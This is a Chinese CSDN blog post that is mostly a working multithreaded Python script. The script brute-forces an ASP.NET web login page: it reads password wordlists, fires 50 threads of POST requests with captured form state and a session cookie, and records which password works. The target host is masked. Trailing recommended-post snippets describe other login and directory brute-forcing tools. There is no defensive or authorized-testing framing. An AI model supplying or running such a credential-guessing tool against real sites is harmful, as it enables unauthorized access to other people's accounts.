webLogin爆破

最新推荐文章于 2024-08-07 10:49:08 发布
最新推荐文章于 2024-08-07 10:49:08 发布
阅读量1.1k 收藏
点赞数
分类专栏: python 文章标签: webLogin 多线程 爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DAo_1990/article/details/83147895
版权 
#coding=utf-8
import queue
import threading
import csv
import time

import os

import re
import requests

PASSWORDDIR =os.getcwd()+"\\PasswordDir"
mPasswordQueue = queue.Queue()  # 存放密码的队列

class MyThread(threading.Thread):
    def __init__(self, func):
        threading.Thread.__init__(self)
        self.func = func
    def run(self):
        self.func()

def do_work():
    while True:#不要使用 while not out_queue.empty():
        password=mPasswordQueue.get()
        #TODO
        result=web_login(password,"用户密码不正确")
        mPasswordQueue.task_done()  # 传入一个相当于完成一个任务
        if result[0]==1 and result[1]==302:
            str_print=("[+]Success:{} {} {} {}".format(result[1], result[2], result[3], result[4]))
            print(str_print)
            break
        else:
            if result[0]==-1:
                mPasswordQueue.put(password)
            str_print =("[-]Fail:{} {} {} {}".format(result[1], result[2], result[3], result[4]))
            print(str_print)
        with open("suceess.csv", "a+", encoding="utf-8",newline='') as f:
            writer = csv.writer(f)
            writer.writerow([result[1], result[2], result[3], result[4]])
            f.close()






def web_login(password,error_password_tips):
    url="http://xxxxxxxxxxxx/Login.aspx"
    header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
               'Accept-Language': 'zh-CN,zh;q=0.9',
               'Cache-Control': 'max-age=0',
               'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
               'Connection': 'keep-alive',
               'Referer': 'http://xxxxxxxxxxxxxx/Login.aspx'
               }

    data="__VIEWSTATE=%2FwEPDwUJNTk5MzkwMTEwD2QWAgIDD2QWAgIGDxAPFgIeB1Zpc2libGVoZGQWAGRkottryBsY1ggu8eeZoJVLs%2FX%2BTBMvQBPzZrNJw6vIEds%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEdAA38pfJWQZqdusZJ0w1r9wEvVK7BrRAtEiqu9nGFEI%2BjB8iHRs8wx0ZsHaVLh4w40eCinihG6d%2FXh3PZm3b5AoMQBz3vgTciq0jjAXrLjCmyWnluaRD6Qd9Og6KeRtbR3Zc1jHnGwsE7K7Ab7Z7ddgMk8XOsz4DupmbdavTQo9Jm9l5DwoD%2BEdmVHWaIrMKl88dBhIQaJG%2BXFYIydigrIZE6pDKHtBNrVQzdCffUUPNz1TkxRDv1DQzRHLO0lOn8x8g1oFPknU2UGjPEOPtnAuV9Oeawen6U0cTWUMuhcyHHRYjLViutcqN30MzShSAVYSw%3D&txtUsername=&txtUserpassword=&txtBigusername=%E6%9D%A8%E5%A9%B7&txtBigpassword={%password%}&btnBiglogin=%E7%99%BB%E5%BD%95&hiddenloginimg=&hiddenmacaddr=&hdhasReturnUrl=&hdDigestID=&hdsnid=&hddogmessage=PFLZFJVA2BP30%2B69F7%2F8"
    fix_data = data.replace("{%password%}", password)
    cookie_list=[{"ASP.NET_SessionId":"335gq1s5j13b4sugk10vryol"}]
    status_code=-1
    content_length=0
    response=""
    try:
        req = requests.post(url, headers=header, data=fix_data, cookies=cookie_list[0])
        response = req.text
        #print(response)
        status_code= req.status_code
        content_length=req.headers['content-length']
    except Exception as e:
        print(str(e))
        return [-1, status_code, content_length, password,"Network connect exception"]
    if re.search(error_password_tips, response) is not None:
        return [0,status_code,content_length,password, "Password is incorrect"]
    return [1,status_code,content_length,password,"???"]


def openFile(passwordFile):
    datas=[]
    f = open(passwordFile, "rb")  # 二进制格式读文件
    while True:
        line = f.readline()
        if not line:
            break
        else:
            try:
                datas.append(line.decode('utf8'))
            except:
                datas.append(str(line))

    return datas




start = time.time()


def main():

    # 都存放到mPasswordQueue队列中
    for file in os.listdir(PASSWORDDIR):
        filePath = os.path.join(PASSWORDDIR,file)
        print("[SCAN]{}".format(filePath))
        datas =openFile(filePath)
        for data in datas:
            mPasswordQueue.put(data.strip("\n"))

    for i in range(50):
        t = MyThread(do_work)  # 线程任务就是将网址的源代码存放到out_queue队列中
        t.setDaemon(True)  # 设置为守护线程
        t.start()

    print ("mPasswordQueue: %d" % mPasswordQueue.qsize())

    mPasswordQueue.join()  # 线程依次执行,主线程最后执行



main()
print ("Total time :%s" % (time.time() - start))
DAo_1990
关注
专栏目录
web—暴力破解
weixin_43916678的博客
02-15 4914
暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。 我们说一个web应用系统存在暴力破解漏洞,一般是指该web应用系统没有采用或者采用了比较弱的认证安全策略,导致其被暴力破解的“可能性”变的
【Web 登录】
qq_44559317的博客
03-23 2352
一、登录信息检验 二、store 中注册用于触发登录操作的方法 三、浅识 Scss
登录密码爆破
gl620321的博客
08-11 6076
一、登录密码爆破 1.登录猜解猜解用户密码爆破属于撞库一类。通过弱口令字典暴力尝试登陆达到猜解用户密码。 2.一般登陆都要验证码,而突破验证码主要有两种: 绕过严重码 自动识别验证码 管理院权限登陆 开启了session,随机生成了一串字符串 查看登陆检测,判断是否开启传输了三个post 存在的话去判断验证码 验证码要是和session的不同,它就回到login这个页面 匹配的话,...
WEB渗透Web突破篇-目录爆破
最新发布
qq_59468567的博客
08-07 527
|工具名称| |cansina| |Cewl| |dirsearch| |dirsearch_bypass403| |dirb| |dirmap| |dontgo403| |feroxbuster| |ffuf| |gobuster| |gau| |gospider| |ihoneyBakFileScan_Modify| |jsluice| |katana| |spray| |urlfounder| |urlbrute| |URLFinder| |waybackurls| |wfuzz|
WEB爆破
zip471642048的博客
01-05 560
web21 用他给的字典burp爆破
web登录
qq_45097213的博客
09-08 609
一、采用纯JSP实现登录功能 1.创建Web项目LoginDemo 2、在web目录下创建login.jsp页面 3、将login.jsp设置为项目首页文件 4、添加项目对应用服务器库的依赖 5、创建登录处理页面do_login.jsp 6、创建登录成功页面success.jsp 7、创建登录失败页面failure.jsp 8、启动服务器,查看运行效果 ...
BU Weblogin Nag卸妆「BU Weblogin Nag Remover」-crx插件
03-23
安装此扩展程序以允许您的浏览器保存BU WebLogin的登录名和密码。 如果您尝试在浏览器中保存您的登录名和...确保https://weblogin.bu.edu不在“从未保存”列表中。 记住安装此扩展后重新启动浏览器。 支持语言:English
WebLogin安装与配置
08-08
WebLogin安装与配置 weblogic8 安装 JBuilder配置 图形解析
UM weblogin「UM Weblogin」-crx插件
03-24
自动输入UM页面的登录信息并单击CTools / Canvas登录按钮。 轻松登录CTools / Canvas,尤其是在不会自动填写登录字段的浏览器上。 支持语言:English
UM Weblogin-crx插件
04-04
UM Weblogin-crx插件是一款专为方便用户登录UM(可能是University Management或某种特定网络服务的缩写)页面而设计的浏览器扩展程序。这款插件主要用于自动填充和提交登录信息,使得用户在访问UM的CTools和Canvas...
weblogin:模拟web登陆
05-03
weblogin 模拟web登陆 技术 语言:Java 开发环境:Eclipse 系统:Windows 简介 Java实现的各种模拟登陆,主要有: 百度 百度翻译 CSDN 人人 新浪微博 人人贷 北理邮箱 北理极速论坛 北理研会 北理研究生院 北理联盟 ...
WebLogin:用于测试与 TAM 集成的登录功能的 Weblogin 模块
06-26
登录 用于测试与 TAM 集成的登录功能的 Weblogin 模块
网站目录爆破工具
08-09
python编写的网站目录爆破 python dirscan.py 输入url 线程数 字典文件即可
爆破字典 大约1400万条左右
12-28
爆破字典 大约1400万条左右 自己收集的一部分 已经排序了
python之WEB登录密码暴力破解
HTTP协议01
05-06 7696
原理:利用字典爆破进行破解 实验环境:本机Win10(python3.7环境)、虚拟机Win2003(搭建DVWA网站) 工具:火狐浏览器、Burp Suite 实现步骤: 1、获取正常登录时需要提交的数据信息。 Burp Suite开启抓包,浏览器范文Dvwa登录页面,按F12开启网络数据查看器,登录dvwa. 可知:username、passwo...
web渗透测试之攻破登录页面
qq_42801460的博客
03-30 6198
有些图形验证码加入的像素线条过于简单,使用图形验证码识别工具可以识别出每次更换的验证码,在平常的漏洞挖掘过程中,如果我们发现登录的验证码非常简单且易于识别,那我们就可以尝试使用自动化工具来进行登录破解了,如 PKAV 的 HTTP Fuzzer。当我们在做渗透测试时,无论厂商项目还是src众测项目,都会遇到给一堆登录系统的URL,然后让我们自己去测,能不能进去全看天的状况,本文将讲一下怎么突破这种封闭的web系统,从而进行更深层次的渗透 ,学完后你会发现,其实你就是系统管理员。
插件分享 | 可进行 Web 路径爆破的 Dirsearch
m0_46699477的博客
05-28 1410
前言: Dirsearch 是一款成熟的命令行工具,旨在暴力扫描页面结构,包括网页中的目录和文件。当我们在使用 Goby 扫描时,有一些网站打开是空白页面或者直觉告诉我们没有这么简单的页面,这时通过目录扫描或许能发现不一样的惊喜(网站后台、未授权访问页面等等),Dirsearch 插件助你能够更便捷的发现这些惊喜。 0x001 插件效果 1.1 插件使用 下载插件并配置 dirsearch.py、python3 路径或命令。接下来就可以在ip详情页跟 webfinder 页面使用 dirsearch。扫.
web 登陆页面
热门推荐
DONGbala_A的博客
03-24 1万+
web程序设计的登陆页面,仅供参考
java web login 接口_JAVAWEB开发之权限管理(一)
weixin_34803929的博客
02-24 370
知识清单1.了解基于资源的权限管理方式2. 掌握权限数据模型3. 掌握基于url的权限管理(不使用Shiro权限框架的情况下实现权限管理)4. shiro实现用户认证5. shiro实现用户授权6. shiro与企业web项目整合开发的方法权限管理原理知识什么是权限管理只要有用户参与的系统一般都要有权限管理,权限管理实现对用户访问系统的控制。按照安全规则或安全策略控制用户可以访问而且只能访问自己被...
weblogin_token翻译
09-17
weblogin_token是一个由英文单词组成的短语。其中,"web"代表网络,"login"代表登录,"token"代表令牌。因此,weblogin_token可以理解为网页登录令牌。令牌是一种用于验证用户身份的信息,它可以用于在网络服务中进行安全的身份验证和授权操作。在网页登录过程中,用户通常需要提供用户名和密码进行身份验证,而weblogin_token则是生成的一种特殊的令牌。这个令牌可以在用户登录成功后返回给用户,用于标识用户身份并在用户访问其他受保护的页面时进行验证。通过使用令牌,可以增加系统的安全性,避免了将用户的真实密码传输到不同的页面中,同时提供了方便的登录体验。weblogin_token可以在多个网络服务中使用,用户可以使用同一个令牌在不同的网页中登录,而无需重复输入用户名和密码。总而言之,weblogin_token是一个用于在网页登录过程中进行身份验证和授权操作的令牌。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值